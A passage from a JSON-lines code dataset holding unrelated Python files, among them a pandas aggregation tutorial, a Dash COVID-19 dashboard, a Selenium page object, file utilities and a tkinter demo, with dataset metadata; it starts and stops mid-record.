쓸 수 있음\n print(sal_by_job.agg(['count', 'mean', 'min', 'max', peak_to_peak]))\n print(sal_by_job.agg(['count', 'mean', 'min', 'max', lambda x: x.max() - x.min()]))\n # lambda 식 가능! 대신 으로 컬럼명 나와서 고쳐야됨\n # agg 함수가 만드는 DataFrame 의 컬럼 이름을 설정하는 방법: keyword argument 방식 or dict 를 파라미터로 전달한다.\n\n # 2) - 2 : keyword argument\n # keyword argument: 컬럼이름 = 함수 (DataFrame)\n print(sal_by_job.agg(Count='count', Average='mean', Minimum='min', Maximum='max', Range=lambda x: x.max() - x.min()))\n\n # 2) - 3 : dict {'key':'value'}\n # emp_df 에서 부서별, 직책별 직원수, 급여 평균, 최소, 최댓값 출력\n # { '컬럼이름': '함수이름' }\n # - future warning : pandas 패키지가 업그레이드 될 때 없어질 수 있는 기능(deprecated), dict 방식보다는 keyword argument 방식을 쓰는 것이 좋다\n grouped = emp_df.groupby(['DEPTNO', 'JOB'])\n sal_by_dept_job = grouped['SAL']\n df = sal_by_dept_job.agg({\n 'Count': 'count',\n 'Average': 'mean',\n 'Minimum': 'min',\n 'Maximum': 'max',\n 'Range': lambda x: x.max() - x.min()\n })\n print(df)\n\n # 2) - 4 : [('컬럼이름', '함수이름')]\n # 리스트 안에 튜플 형식으로 쓰는 방법\n # print(result_day_2.agg([('average', 'mean'), ('stddev', 'std'), ('range', peak_to_peak)])) -- ex04 에 예시 있음\n","sub_path":"scratch10/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"367133264","text":"#!/bin/python\n\nimport os\nimport csv\nimport pandas as pd\n\ncomplete = pd.read_table('../output/hla_complete.tsv')\nwith open('../html/HLA_alleles/ukb_to_asterisk_names.csv', mode='r') as infile:\n reader = csv.reader(infile)\n names_dict = {rows[0]:rows[1] for rows in reader}\n\ncount = 0\nconcordance_tot = 0\n\nfor gbe_id in os.listdir('../output/snpnet/'):\n if \"out\" not in gbe_id:\n bma_alleles = list(complete[(complete['GBE_ID'] == gbe_id) & (complete['BMA_posterior_mean'].notna())].sort_values('BMA_posterior_mean', ascending=False)['allelotype'])\n with open('../output/snpnet/' + gbe_id + '/' + gbe_id + '_snpnet.txt') as f:\n snpnet_alleles = f.read().splitlines()\n to_remove = ['PC' + str(i) for i in range(1, 11)] + ['age', 'sex']\n snpnet_alleles = [allele for allele in snpnet_alleles if allele not in to_remove]\n snpnet_alleles = [allele[:-2] for allele in snpnet_alleles]\n snpnet_alleles = [names_dict[allele] for allele in snpnet_alleles]\n if len(bma_alleles) > 0 and len(snpnet_alleles) > 0:\n count += 1\n print(gbe_id)\n num_alleles = min(len(bma_alleles), len(snpnet_alleles), 10)\n concordance = len(set(bma_alleles[:num_alleles]).intersection(set(snpnet_alleles[:num_alleles])))/float(num_alleles)\n concordance_tot += concordance\n print(concordance)\n print(bma_alleles, snpnet_alleles)\nprint(concordance_tot/count)\n","sub_path":"scripts/compare_bma_snpnet.py","file_name":"compare_bma_snpnet.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"267712247","text":"import shutil\nimport datetime\nimport os\nimport logging\n\ndef copy_file_to_folder(pathFile, dest_path):\n date = datetime.datetime.now().strftime(\"%m%d%Y_%h%M%s\")\n exist = os.path.isfile(pathFile)\n\n if exist:\n log_error(\"file has exist.\" + pathFile)\n return\n \n shutil.copyfile(pathFile, dest_path)\n print(\"file has copied to : \" + dest_path)\n\ndef backup_file(pathFile):\n date = datetime.datetime.now().strftime(\"%m%d%Y_%h%M%s\")\n\n dest_file = \"/content/drive/MyDrive/BillardAI/Models/best_\" + date + \".pt\"\n\n exist = os.path.isfile(dest_file)\n\n if exist:\n os.remove(dest_file)\n log_message(\"file has removed : \" + \"best_\" + date + \".pt\")\n return\n \n shutil.copyfile(pathFile, dest_file)\n log_message(\"file has copied to : \" + \"best_\" + date + \".pt\")\n\ndef movefile(pathFile):\n date = datetime.datetime.now().strftime(\"%m%d%Y\")\n dest_file = \"/content/drive/MyDrive/BillardAI/Models/best_\" + date + \".pt\"\n exist = os.path.isfile(dest_file)\n\n if exist:\n os.remove(dest_file)\n log_message(\"file has removed : \" + \"best_\" + date + \".pt\")\n return\n \n shutil.move(pathFile, dest_file)\n log_message(\"file has moved to : \" + \"best_\" + date + \".pt\")\n\n \ndef zipdir(zipFolder):\n date = datetime.datetime.now().strftime(\"%m%d%Y\")\n output_filename = zipFolder + \"label_\" + date + \".zip\"\n shutil.make_archive(output_filename, 'zip', zipFolder)\n\ndef unzip(zipFile):\n # unzip dataset\n if not os.path.isfile(zipFile):\n log_error(\"The zip file not found !!!\")\n return 0\n shutil.unpack_archive(zipFile, \"/content/Dataset\")\n log_message(\"The file has unzip.\")\n return 1\n\ndef log_error(message, *arguments):\n prefix = colorstr('red', 'bold', 'Error:')\n print(f\"{prefix} {message}\", arguments)\n\n\ndef log_message(message):\n prefix = colorstr('green', 'bold', 'Message:')\n print(f\"{prefix} {message}\")\n\ndef colorstr(*input):\n *args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string\n colors = {'black': '\\033[30m', # basic colors\n 'red': '\\033[31m',\n 'green': '\\033[32m',\n 'yellow': '\\033[33m',\n 'blue': '\\033[34m',\n 'magenta': '\\033[35m',\n 'cyan': '\\033[36m',\n 'white': '\\033[37m',\n 'bright_black': '\\033[90m', # bright colors\n 'bright_red': '\\033[91m',\n 'bright_green': '\\033[92m',\n 'bright_yellow': '\\033[93m',\n 'bright_blue': '\\033[94m',\n 'bright_magenta': '\\033[95m',\n 'bright_cyan': '\\033[96m',\n 'bright_white': '\\033[97m',\n 'end': '\\033[0m', # misc\n 'bold': '\\033[1m',\n 'underline': '\\033[4m'}\n return ''.join(colors[x] for x in args) + f'{string}' + colors['end']\n\ndef mkdir(path):\n if not os.path.isdir(path):\n os.mkdir(path)\n return 1\n\n log_error(f\"The path {path} has existed !\" )\n return 0","sub_path":"ultils/ultils.py","file_name":"ultils.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419607625","text":"import copy\nfrom io import BytesIO\nfrom typing import Optional, List\nfrom typing import Union\n\nfrom .cookies import Cookie\nfrom .headers import Headers\nfrom .http_status import HttpStatus\n\n\nclass HttpResponse:\n def __init__(\n self,\n status: Union[int, HttpStatus] = HttpStatus.OK,\n body: Union[bytes, bytearray, str, None] = None,\n encoding: str = \"utf-8\",\n headers: Optional[Union[dict, Headers]] = None,\n ):\n self._headers = headers if isinstance(headers, Headers) else Headers(headers)\n self.status_code = status\n self.body = BytesIO()\n self.encoding = encoding\n self.cookies: List[Cookie] = []\n\n if body:\n self.write(body)\n\n @property\n def headers(self):\n headers: Headers = copy.copy(self._headers)\n for cookie in self.cookies:\n headers.set(*cookie.header())\n return headers\n\n def write(self, body: Union[str, bytes, bytearray]) -> None:\n if isinstance(body, str):\n self.body.write(body.encode(self.encoding))\n else:\n self.body.write(body)\n\n @property\n def writable(self):\n return not self.body.closed\n\n def close(self):\n self.body.close()\n\n def __str__(self):\n self.body.seek(0)\n return self.body.read().decode(self.encoding)\n\n\n__all__ = [\"HttpResponse\"]\n","sub_path":"chocs/http_response.py","file_name":"http_response.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"579409725","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 8 20:33:42 2021\n\n@author: Jiwoo Ahn\n\"\"\"\n\nimport pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output \nfrom datetime import timedelta\nfrom datetime import date as dtdate\n\n# Import relevant libraries\nimport pandas as pd\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\n# Initiate the app\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.title = 'AusCovidDash'\n\ncolors = {\n 'background': '#000000',\n 'text': '#5d76a9',\n 'label': '#f5b112'\n}\n\n# Pull data from John Hopkins University and organise into dataframe \ndf = pd.read_csv('https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\n\n# Curve fitting Global COVID-19 Cases\nglobal max_date\nmax_date = dtdate.today() - timedelta(days=7)\n\ndef logistic(t, a, b, c, d):\n return c + (d - c)/(1 + a * np.exp(- b * t))\n\ndef exponential(t, a, b, c):\n return a * np.exp(b * t) + c\n \ndef doubling(t):\n return (1+np.log(2)/2)**t\n\ndef plotCases(dataframe, column, state, start_date, curvefit, forecast):\n\n #fig = go.Figure()\n fig = make_subplots(rows=1,cols=2,subplot_titles=('Total Cases','New Cases'))\n fig.update_layout(template='ggplot2')\n fig.update_layout(autosize=True,margin={'t':30})\n #fig.update_layout(title='Australia Covid-19 Dashboard',title_font_size=30,title_x=0.5) \n fig.update_layout(legend={'title':'Legend','bordercolor':'black','borderwidth':1})\n fig.update_layout(legend_title_font=dict(family=\"Verdana\",size=16,color=colors['text']))\n \n fig.update_layout(\n font=dict(\n family=\"Verdana\",\n size=12,\n color=colors['text']\n ))\n\n # PSM_ColorMap = [(0,0,0),\n # (27/256,38/256,100/256),\n # (245/256,130/256,100/256),\n # (134/256,200/256,230/256),\n # (210/256,210/256,185/256),\n # (74/256,93/256,206/256),\n # (249/256,180/256,161/256),\n # (16/256,23/256,60/256),\n # (194/256,50/256,13/256),\n # (37/256,136/256,181/256),\n # (144/256,144/256,93/256)]\n \n co = dataframe[dataframe[column] == state].iloc[:,4:].T.sum(axis = 1)\n co = pd.DataFrame(co)\n co.columns = ['Cases']\n co['date'] = co.index\n co['date'] = pd.to_datetime(co['date']) \n mask = (co['date'] >= start_date)\n co = co.loc[mask]\n co['Cases'] = co['Cases'] - co['Cases'][0]\n \n y = np.array(co['Cases'])\n x = np.arange(y.size)\n date = co['date']\n \n x2 = np.arange(y.size+forecast)\n x3 = np.arange(y.size+forecast+100)\n \n date2 = pd.date_range(date[0],freq='1d',periods=len(date)+forecast)\n \n fig.add_trace(go.Scatter(x=date,y=y,mode='markers',name='Total Cases',marker_color='rgba(27,38,100,.8)'),row=1,col=1)\n\n # Logistic regression -----------------------------------------------------------------------\n lpopt, lpcov = curve_fit(logistic, x, y, maxfev=10000)\n #lerror = np.sqrt(np.diag(lpcov))\n # for logistic curve at half maximum, slope = growth rate/2. so doubling time = ln(2) / (growth rate/2)\n ldoubletime = np.log(2)/(lpopt[1]/2)\n ## standard error\n #ldoubletimeerror = 1.96 * ldoubletime * np.abs(lerror[1]/lpopt[1])\n \n # calculate R^2\n residuals = y - logistic(x, *lpopt)\n ss_res = np.sum(residuals**2)\n ss_tot = np.sum((y - np.mean(y))**2)\n logisticr2 = 1 - (ss_res / ss_tot) \n \n if logisticr2 >= 0 and logisticr2 <= 1:\n fig.add_trace(go.Scatter(x=date2,y=logistic(x2, *lpopt), mode='lines', name=\"Logistic (r2={0}) Td={1}d\".format(round(logisticr2,2),round(ldoubletime,1)),line_color='rgba(245,130,100,.8)',line_shape='spline',line_dash='dash'),row=1,col=1)\n # -----------------------------------------------------------------------\n \n \n # Exponential regression--------------------------------------------------------------------\n epopt, epcov = curve_fit(exponential, x, y, bounds=([0.99,0,-0.001],[1.01,0.9,0.001]), maxfev=10000)\n #eerror = np.sqrt(np.diag(epcov))\n \n # for exponential curve, slope = growth rate. so doubling time = ln(2) / growth rate\n edoubletime = np.log(2)/epopt[1]\n ## standard error\n #edoubletimeerror = 1.96 * edoubletime * np.abs(eerror[1]/epopt[1])\n \n # calculate R^2\n residuals = y - exponential(x, *epopt)\n ss_res = np.sum(residuals**2)\n ss_tot = np.sum((y - np.mean(y))**2)\n expr2 = 1 - (ss_res / ss_tot)\n \n if expr2 >= 0 and expr2 <= 1:\n fig.add_trace(go.Scatter(x=date2,y=exponential(x2, *epopt), mode='lines', name=\"Exponential (r2={0}) Td={1}d\".format(round(expr2,2),round(edoubletime,1)),line_color='rgba(134,200,230,.8)',line_shape='spline',line_dash='dash'),row=1,col=1)\n # --------------------------------------------------------------------\n\n # Calculations for new cases\n delta = np.diff(co['Cases'])\n fig.add_trace(go.Scatter(x=y[1:],y=delta,mode='lines',name='New Daily Cases',line_color='rgba(210,210,185,.8)'),row=1,col=2)\n \n dbl_cases = 2**(x3/2)\n dbl_delta = 0.5*np.log(2)*np.exp((np.log(2)*x3)/2)\n fig.add_trace(go.Scatter(x=dbl_cases,y=dbl_delta,mode='lines',name='2 Day Doubling Time',line = {'color':'black','dash':'dash'}),row=1,col=2)\n \n fig.update_xaxes(showline=True, linewidth=1, linecolor='black', mirror=True)\n fig.update_yaxes(showline=True, linewidth=1, linecolor='black', mirror=True)\n \n fig.update_xaxes(title_text='Date',fixedrange=True,row=1,col=1)\n fig.update_yaxes(title_text='Total confirmed cases since {0}'.format(start_date),fixedrange=True,row=1,col=1)\n \n fig.update_xaxes(title_text='Total confirmed cases since {0}'.format(start_date),range=[0,np.log10(max(y)+100)],type=\"log\",fixedrange=True,row=1,col=2)\n fig.update_yaxes(title_text='New daily cases',type=\"log\",range=[0,np.log10(max(delta)+100)],fixedrange=True,row=1,col=2)\n \n return fig\n \naus_states = ['Queensland','New South Wales','Victoria','Western Australia','South Australia', 'Tasmania', 'Australian Capital Territory']\n\n\n\napp.layout = html.Div([\n html.H1(children='Australia Covid-19 Dashboard',\n style={'textAlign': 'center','font-family':'Verdana','color': colors['text'],'padding-top': 20}),\n html.P(children='''Graph settings''',\n style={'textAlign': 'center','font-size':24,'font-family':'Verdana','color': colors['text'],'padding-bottom': 10}),\n html.Div([html.Label([\"State\",dcc.Dropdown(id='state-select', options=[{'label': i, 'value': i} for i in aus_states],\n value='Queensland', style={'width': '250px', 'display':'inline-block', 'margin-left':'10px','vertical-align':'middle'})])],\n style={'vertical-align':'middle','margin-top':'10px','font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']}),\n html.Div([\n html.Label([\"Start Date\",dcc.DatePickerSingle(id='my-date-picker-single',\n min_date_allowed=dtdate(2020, 1, 22),\n max_date_allowed=(max_date),\n initial_visible_month=dtdate(2021, 1, 1),\n date=dtdate(2021, 1, 1),style={'display':'inline-block', 'margin-left':'10px'})])],style={'vertical-align':'middle','margin-top':'10px','font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']}),\n dcc.Graph('dashboard', figure={\"layout\" : {\"height\":600}},config={'displayModeBar': False}),\n html.Div(dcc.Markdown('''\n The total cases chart presents all COVID-19 cases in each state since the specified start date, as a function of time. Logistic and exponential regression indicates potential trajectories of growth.\n \n The new cases chart presents daily increase in COVID-19 cases vs. the total confirmed cases to date. When plotted in this way, exponential growth is represented as a straight line that slopes upwards. \n \n \n _Created by : Jiwoo Ahn_\n \n Data provided by Johns Hopkins University (updated daily around 00:00 UTC / 20:00 ET)\n \n [Github Repo](https://github.com/j-ahn/AusCovidDash)\n \n '''), style = {'font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']}),\n html.Div(children=('Last updated : {0}'.format(dtdate.today().strftime('%d-%B-%Y'))),\n style = {'font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']})\n ])\n\n@app.callback(\n Output('dashboard', 'figure'),\n [Input('state-select', 'value')],\n [Input('my-date-picker-single','date')]\n)\ndef update_graph(value,date_value):\n global max_date\n max_date = dtdate.today() - timedelta(days=7)\n # Pull data from John Hopkins University and organise into dataframe \n df = pd.read_csv('https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\n return plotCases(df, 'Province/State', value, date_value, True, 3)\n\nif __name__ == '__main__':\n app.run_server()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"126100708","text":"from tkinter import *\nfrom PIL import ImageTk,Image\nroot=Tk()\nroot.title(\"Learn to code\")\nroot.iconbitmap('f:iron.ico')\n#r=IntVar()\n#r.set(2)\nmodes=[\n\n (\"peparroni\",\"peparroni\"),\n (\"cheese\",\"cheese\"),\n (\"mushroom\",\"mushroom\"),\n (\"mix\",\"mix\"),\n (\"double\",\"double\")\n\n\n\n]\npizza=StringVar()\npizza.set(\"peparroni\")\n\ndef clicked(value):\n l=Label(root,text=value).pack()\n\nfor text,mode in modes:\n Radiobutton(root,text=text,variable=pizza,value=mode).pack(anchor=W)\n\n#Radiobutton(root,text=\"Option1\",variable=r,value=1).pack()\n#Radiobutton(root,text=\"Option2\",variable=r,value=2).pack()\n#Radiobutton(root,text=\"Option3\",variable=r,value=3).pack()\n\nl=Label(root,text=pizza.get()).pack()\n\n\n\n\n\nb=Button(root,text=\"Click me\",command=lambda: clicked(pizza.get())).pack()\nroot.mainloop()","sub_path":"tkinter7.py","file_name":"tkinter7.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233982600","text":"from __future__ import print_function, division\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport time\nfrom base.seleniumdriver import SeleniumDriver\nimport utilities.custom_logger as cl\nimport logging\nfrom pages.cloud.cloud_page import CloudPage\nfrom utilities.tstatus import TStatus\n\n\n\n\nclass DataCenterPage(SeleniumDriver):\n log = cl.customLogger(logging.DEBUG)\n def __init__(self, driver):\n SeleniumDriver.__init__(self, driver)\n self.driver = driver\n self.tst = TStatus(self.driver)\n\n# Creating locators for login page\n\n __data_center_tab = \"nav-list-item-DATA_CENTERS\"\n __data_center_table = \"//*[@id='zscm']/div/div[2]/div/div[2]/div[1]/div/div[2]\"\n _cloud_icon = \"nav-list-item-CLOUD\"\n _addNewDataCenter = \"//*[@id='zscm']/div/div[2]/div/div[1]/div[1]/div/span\"\n _nameInput = \"form-component-input-name\"\n _providerInput = \"form-component-input-provider\"\n _countryDropDown = \"form-component-dropDown-country\"\n _countryDropDownOption1 = \"#form-component-dropDown-country > div.drop-down-list-container.allow-search > ul > li:nth-child(1)\"\n _cityInput = \"form-component-input-city\"\n _lattitude = \"form-component-inputWithRadioButtons-latitudeAbs\"\n _saveButton = \"//*[@id='zscm']/div/div[2]/div/div[3]/span/div/div[3]/span[1]\"\n _remove_datacenter_icon = \"//*[contains(text(), 'OliaOlia')]/following-sibling::div/span[@title='Remove']\"\n _edit_datacenter_button = \"//*[contains(text(), 'OliaOlia')]/following-sibling::div/span[@title='Edit']\"\n _disabled_save_button = \"//*[@id='zscm']/div/div[2]/div/div[3]/span/div/div[3]/span[1]\"\n _cancel_button = \"//*[@id='zscm']/div/div[2]/div/div[3]/span/div/div[3]/span[2]\"\n _remove_edited_datacenter_icon = \"//*[contains(text(), 'NewOliaOliaOliaOlia')]/following-sibling::div/span[@title='Remove']\"\n _check = \"//*[contains(text(), 'OliaOlia12')]/following-sibling::div/span[@title='Remove']\"\n\n\n\n\n\n\n# Methods will be used for test scenarios\n\n def dataCenterTable(self, locator):\n self.locator = \"//*[@id='zscm']/div/div[2]/div/div[2]/div[1]/div/div\" + str(locator)\n return self.locator\n\n def clickDataCenterTab(self):\n self.waitForElement(self._cloud_icon)\n self.verifyElements(self._cloud_icon)\n self.elementClick(self._cloud_icon)\n self.waitForElement(self.__data_center_tab)\n self.verifyElements(self.__data_center_tab)\n self.elementClick(self.__data_center_tab)\n\n def loopThroughTables(self,text,locator):\n # self.getElementText(text, self.__data_center_table, locatorType=\"css\")\n result = self.getElement(self.dataCenterTable(locator), locatorType=\"xpath\").text\n if result == text:\n result = True\n self.tst.markFinal(\"test_DATA_CENTER_Tables\", result, \"All tables are displaying correctly\")\n else:\n result = False\n self.tst.markFinal(\"test_DATA_CENTER_Tables\", result, \"All tables are NOT displaying correctly\")\n\n def clickAddNewDataCenter(self):\n self.elementClick(self._addNewDataCenter, locatorType=\"xpath\")\n\n def sendDataDataCenter(self, name, city, provider,latitude):\n self.waitForElement(self._nameInput)\n self.verifyElements(self._nameInput)\n self.sendKeys(name, self._nameInput)\n self.waitForElement(self._cityInput)\n self.verifyElements()\n self.sendKeys(city, self._cityInput)\n self.sendKeys(provider, self._providerInput)\n self.sendKeys(latitude, self._lattitude)\n\n def clickSaveButton(self):\n self.elementClick(self._saveButton, locatorType=\"xpath\")\n\n def chooseCountry(self):\n self.elementClick(self._countryDropDown)\n time.sleep(3)\n self.elementClick(self._countryDropDownOption1, locatorType=\"css\")\n\n def clickRemoveIcon(self):\n self.elementClick(self._remove_datacenter_icon, locatorType=\"xpath\")\n\n def clickEditIcon(self):\n self.elementClick(self._edit_datacenter_button, locatorType=\"xpath\")\n\n def preconditionData1(self):\n result = self.isElementPresent(self._remove_datacenter_icon, locatorType=\"xpath\")\n return result\n\n def preconditionData2(self):\n result = self.isElementPresent(self._edit_datacenter_button, locatorType=\"xpath\")\n return result\n\n def preconditionData3(self):\n result = self.isElementPresent(self._check, locatorType=\"xpath\")\n return result\n\n def removeEditedbutton(self):\n return self.waitForElement(self._remove_edited_datacenter_icon, locatorType=\"xpath\")\n\n def clickCancel(self):\n self.elementClick(self._cancel_button, locatorType=\"xpath\")\n\n def clickRemoveIcon2(self):\n self.elementClick(self._remove_edited_datacenter_icon, locatorType=\"xpath\")\n\n\n def preconditionCheck1(self):\n if self.preconditionData1() == True:\n self.log.info(\"Data Center exists\")\n self.deleteDataCenter()\n time.sleep(2)\n self.log.info(\"Succesfully deleted Data Center\")\n else:\n self.log.info(\"Pre-condition no data center exists\")\n\n def preconditionCheck2(self):\n if self.preconditionData2() == True:\n self.log.info(\"Data center exists and is ready to be edited\")\n else:\n self.log.info(\"No data center found for editing\")\n self.createDataCenter(name=\"OliaOlia\", city=\"san Jose\", provider=\"Automation\", latitude=\"2\")\n\n # Verification methods\n\n def verifyUnableCreateEmptyDataCenter(self):\n result = self.isElementPresent(self._disabled_save_button,locatorType=\"xpath\")\n if result == True:\n self.tst.markFinal(\"verifyUnableCreateEmptyDataCenter\", result, \"Success! UNABLE to create an empty DataCenter\")\n else:\n self.tst.markFinal(\"verifyUnableCreateEmptyDataCenter\", result, \"FAILED WAS ABLE to create an empty DataCenter\")\n\n def verifyHardwareCreated(self):\n result = self.isElementPresent(self._remove_datacenter_icon, locatorType=\"xpath\")\n if result == True:\n self.tst.markFinal(\"verifyDataCenterCreated\", result, \"Success! DataCenter was created\")\n else:\n self.tst.markFinal(\"verifyDataCenterCreated\", result, \"FAILED DataCenter was not created\")\n\n\n def verifyHardwareNotCreated(self):\n result = self.isElementPresentFake(self._remove_datacenter_icon, locatorType=\"xpath\")\n if result == True:\n self.tst.markFinal(\"verifyDataCenterCreated\", result, \"Success! DataCenter not Create\")\n else:\n self.tst.markFinal(\"verifyDataCenterCreated\", result, \"FAILED Empty DataCenter was created\")\n\n # Scenarios\n\n def verifyDataCenterEdited(self):\n result = self.isElementPresent(self._remove_edited_datacenter_icon, locatorType=\"xpath\")\n if result == True:\n self.tst.markFinal(\"verifyDataCenterCreated\", result, \"Success! DataCenter was edited\")\n else:\n self.tst.markFinal(\"verifyDataCenterCreated\", result, \"FAILED DataCenter was not edited\")\n\n\n def createDataCenter(self, name=\"\", city=\"\", provider=\"\", latitude=\"\"):\n self.log.info(\"Checking if Data Center with the same name already exists\")\n self.preconditionCheck1()\n self.log.info(\"Creating new data center\")\n self.clickAddNewDataCenter()\n time.sleep(3)\n self.sendDataDataCenter(name, city, provider, latitude)\n time.sleep(3)\n self.chooseCountry()\n time.sleep(5)\n self.clickSaveButton()\n time.sleep(5)\n self.verifyHardwareCreated()\n\n def deleteDataCenter(self):\n self.log.info(\"Deleting data center\")\n self.clickRemoveIcon()\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(2)\n\n def deleteEditedDataCenter(self):\n self.log.info(\"Deleting data center\")\n self.clickRemoveIcon2()\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(2)\n\n def createEmptyDataCenter(self):\n self.log.info(\"Creating empty data center\")\n self.clickAddNewDataCenter()\n self.clickSaveButton()\n self.verifyUnableCreateEmptyDataCenter()\n self.log.info(\"Clicking cancel button\")\n self.clickCancel()\n\n\n def editDataCenter(self):\n self.preconditionCheck2()\n self.clickEditIcon()\n self.log.info(\"Editing data center\")\n self.sendDataDataCenter(\"NewOliaOlia\", \"San jose\", \"Automation\", \"1\")\n self.clickSaveButton()\n time.sleep(3)\n self.verifyDataCenterEdited()\n\n\n\n\n\n","sub_path":"pages/datacenter/datacenter_page.py","file_name":"datacenter_page.py","file_ext":"py","file_size_in_byte":8747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"63252911","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jul 10\r\n\r\n@author: Ancient Abysswalker\r\n\"\"\"\r\n\r\ndef checkPrime(number,Primes):\r\n for Prime in Primes:\r\n if number%Prime == 0:\r\n return False\r\n return True\r\n\r\n#I'm just going to cheat a little here :3\r\nimport urllib \r\nsock = urllib.request.urlopen('http://primos.mat.br/primeiros_10000_primos.txt') \r\nhtmlSource = sock.read() \r\nsock.close() \r\n\r\nprimes=[]\r\nfor each in htmlSource.split():\r\n\tprimes.append(int(each))\r\n\t\r\n#Move up from 10000th prime to find next prime\r\ncurrentValue=primes[-1]\r\nwhile True:\r\n\tif checkPrime(currentValue,primes):\r\n\t\tbreak\r\n\telse:\r\n\t\tcurrentValue+=1\r\nprint(currentValue)","sub_path":"Euler Projekt 007 - 10001st Prime/EulerProjekt_7.py","file_name":"EulerProjekt_7.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"473851281","text":"import FWCore.ParameterSet.Config as cms\nADSmd0pimkpimdcs = cms.EDAnalyzer(\"DataCardFileWriter\",\n\tFileName = cms.string(\"ADSmd0pimkpimdcs.dec\"),\n\tFileContent = cms.vstring()\n\t)\nADSmd0pimkpimdcs.FileContent.extend([\n\t\"#\",\n\t\"#\",\n\t\"# O. Long / UCSB\",\n\t\"#\",\n\t\"# $Id: ADS-d0pi-kpi-dcs.dec,v 1.1 2004/05/17 22:51:40 owen Exp $\",\n\t\"#\",\n\t\"#\",\n\t\"Alias MyB+ B+\",\n\t\"Alias MyB- B-\",\n\t\"Alias MyD0 D0\",\n\t\"Alias Myanti-D0 anti-D0\",\n\t\"#\",\n\t\"Decay Upsilon(4S)\",\n\t\"0.5 MyB+ B- VSS;\",\n\t\"0.5 MyB- B+ VSS;\",\n\t\"Enddecay\",\n\t\"#\",\n\t\"#\",\n\t\"Decay MyB-\",\n\t\"1.0 pi- MyD0 PHSP;\",\n\t\"Enddecay\",\n\t\"#\",\n\t\"Decay MyB+\",\n\t\"1.0 pi+ Myanti-D0 PHSP;\",\n\t\"Enddecay\",\n\t\"#\",\n\t\"Decay MyD0\",\n\t\"1.0 K+ pi- PHSP;\",\n\t\"Enddecay\",\n\t\"#\",\n\t\"Decay Myanti-D0\",\n\t\"1.0 K- pi+ PHSP;\",\n\t\"Enddecay\",\n\t\"#\",\n\t\"#\",\n\t\"End\"\n\t])\n","sub_path":"python/ADSmd0pimkpimdcs.py","file_name":"ADSmd0pimkpimdcs.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"90839287","text":"from ControleSapSku.Consultas.gambis import relatorioGeral\nfrom manipulateSheet.OpenCsv import OpenCsv\n\ndef modelo(sku, value):\n return f'{sku}-{(4 - len(str(value))) * \"0\" + str(value)}'\n\narraySheet = OpenCsv('/home/bertho/Documents/Aut/enviar_lucas').csvToDic()\ncc = 0\nusados = []\n# att = open('/home/bertho/Documents/Aut/relatorio/att_imgs.csv', 'w', encoding='utf-8')\n# att.write('\"sku\",\"thumbnail_image\",\"additional_images\"\\n')\nhh = open(f'/home/bertho/Documents/Aut/relatorio/atr_set_sku/geral.csv', 'w', encoding='utf-8')\nheader = '\"sku\",\"desc\"'\nhh.write(f'{header}\\n')\nhh.close()\n\ngeral = relatorioGeral()\nDicCalda = {}\nfor obj in geral:\n DicCalda[obj.sku] = obj.value\n\nfor sheet in arraySheet:\n\n # exit(sheet.getSheetName())\n for linha in sheet.gerArrayDic():\n # exit(linha)\n if linha == '':\n continue\n exit(linha)\n if linha[\"sku\"].split(\"-\")[0] not in usados:\n sku = linha[\"sku\"].split('-')[0]\n try:\n DicCalda[sku]\n except:\n print(sku)\n continue\n for caldas in range(1, DicCalda[sku] + 1):\n newSku = modelo(sku, caldas)\n with open(f'/home/bertho/Documents/Aut/relatorio/atr_set_sku/geral.csv', 'a+', encoding='utf-8') as w:\n # text = f'\"{linha[\"sap\"]}\",\"{linha[\"sku\"].split(\"-\")[0]}\",\"{linha[\"attribute_set_code\"]}\"'\n try:\n altura = str(linha[\"volume_altura\"]).split('.')[0]\n except:\n altura = linha[\"volume_altura\"]\n\n try:\n comprimento = str(linha[\"volume_comprimento\"]).split('.')[0]\n except:\n comprimento = linha[\"volume_comprimento\"]\n\n try:\n largura = str(linha[\"volume_largura\"]).split('.')[0]\n except:\n largura = 